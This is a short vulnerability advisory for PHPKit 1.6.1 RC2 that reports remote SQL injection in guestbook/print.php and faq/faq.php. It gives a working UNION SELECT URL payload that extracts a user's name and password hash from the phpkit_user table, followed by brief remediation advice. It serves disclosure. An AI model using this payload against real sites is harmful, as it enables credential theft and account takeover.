±-------------------------------------------------------------------
+
±-------------------------------------------------------------------
+
- Affected Software .: PHPKit 1.6.1 RC2
- Venedor …: http://www.phpkit.de/
- Class …: Remote SQL Injection
- Risk …: high
- Found by …: Philipp Niedziela
- Contact …: webmaster[at]bb-pcsecurity[.]de
±-------------------------------------------------------------------
+
- SQL-INJECTION IN SEVERAL FILES:
- guestbook/print.php
- faq/faq.php
- more (but untested!)
±-------------------------------------------------------------------
+
±-------------------------------------------------------------------
+
- /include.php?path=faq/faq.php&catid=-1\'%20UNION%20SELECT%20
- 1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20
- FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'1\'=\'1
- Solution:
- -> Install Hack_Block (search google :))
- -> escape the variables in your SQL-Statement
±-------------------------------------------------------------------
+
- Greets and Thanks: /str0ke
±------------------------[ E O F ]----------------------------------